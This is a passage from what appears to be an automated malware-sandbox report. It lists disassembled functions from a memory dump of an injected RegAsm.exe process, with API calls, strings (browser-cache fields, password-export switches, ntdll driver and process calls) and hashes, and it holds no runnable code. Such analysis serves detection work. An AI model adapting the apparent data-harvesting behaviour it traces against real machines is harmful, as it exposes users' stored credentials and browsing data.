                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                • API String ID: 3849927982-2252543386
                                                • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                • _snwprintf.MSVCRT ref: 0044488A
                                                • wcscpy.MSVCRT ref: 004448B4
                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                • API String ID: 2899246560-1542517562
                                                • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004091E2
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                • memcmp.MSVCRT ref: 004092D9
                                                • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                • memcmp.MSVCRT ref: 0040933B
                                                • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                • memcmp.MSVCRT ref: 00409411
                                                • memcmp.MSVCRT ref: 00409429
                                                • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                • memcmp.MSVCRT ref: 004094AC
                                                • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                • String ID:
                                                • API String ID: 3715365532-3916222277
                                                • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                • memset.MSVCRT ref: 004085CF
                                                • memset.MSVCRT ref: 004085F1
                                                • memset.MSVCRT ref: 00408606
                                                • strcmp.MSVCRT ref: 00408645
                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                • memset.MSVCRT ref: 0040870E
                                                • strcmp.MSVCRT ref: 0040876B
                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                • CloseHandle.KERNEL32(?), ref: 004087A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                • String ID: ---
                                                • API String ID: 3437578500-2854292027
                                                • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                • malloc.MSVCRT ref: 004186B7
                                                • free.MSVCRT ref: 004186C7
                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                • free.MSVCRT ref: 004186E0
                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                • malloc.MSVCRT ref: 004186FE
                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                • free.MSVCRT ref: 00418716
                                                • free.MSVCRT ref: 0041872A
                                                • free.MSVCRT ref: 00418749
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: free$FullNamePath$malloc$Version
                                                • String ID: |A
                                                • API String ID: 3356672799-1717621600
                                                • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                • API String ID: 2081463915-1959339147
                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDC.USER32(00000000), ref: 004121FF
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                • String ID:
                                                • API String ID: 1700100422-0
                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                • String ID:
                                                • API String ID: 552707033-0
                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                Function 00414621 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 99COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$_snwprintf
                                                • String ID: %%0.%df
                                                • API String ID: 3473751417-763548558
                                                • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                • KillTimer.USER32(?,00000041), ref: 004060D7
                                                • KillTimer.USER32(?,00000041), ref: 004060E8
                                                • GetTickCount.KERNEL32 ref: 0040610B
                                                • GetParent.USER32(?), ref: 00406136
                                                • SendMessageW.USER32(00000000), ref: 0040613D
                                                • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                • String ID: A
                                                • API String ID: 2892645895-3554254475
                                                • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                Function 0041352F Relevance: 17.5, APIs: 1, Strings: 9, Instructions: 41COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                • API String ID: 4139908857-2887671607
                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                  • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                  • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                • strchr.MSVCRT ref: 0040C140
                                                • strchr.MSVCRT ref: 0040C151
                                                • _strlwr.MSVCRT ref: 0040C15F
                                                • memset.MSVCRT ref: 0040C17A
                                                • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                • String ID: 4$h
                                                • API String ID: 4019544885-1856150674
                                                • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                • String ID: 0$6
                                                • API String ID: 4066108131-3849865405
                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 004082EF
                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                • memset.MSVCRT ref: 00408362
                                                • memset.MSVCRT ref: 00408377
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memset$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 290601579-0
                                                • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 0040A47B
                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                • wcslen.MSVCRT ref: 0040A4BA
                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                • wcslen.MSVCRT ref: 0040A4E0
                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpywcslen$_snwprintfmemset
                                                • String ID: %s (%s)$YV@
                                                • API String ID: 3979103747-598926743
                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                • wcslen.MSVCRT ref: 0040A6B1
                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                • String ID: Unknown Error$netmsg.dll
                                                • API String ID: 2767993716-572158859
                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • unable to open database: %s, xrefs: 0042F84E
                                                • database is already attached, xrefs: 0042F721
                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                • out of memory, xrefs: 0042F865
                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                • database %s is already in use, xrefs: 0042F6C5
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: memcpymemset
                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                • API String ID: 1297977491-2001300268
                                                • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                • wcslen.MSVCRT ref: 0040D1D3
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                • String ID: strings
                                                • API String ID: 3166385802-3030018805
                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                Function 004044A4 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.515863399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_400000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Library$FreeLoadMessage
                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                • API String ID: 3897320386-317687271
                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
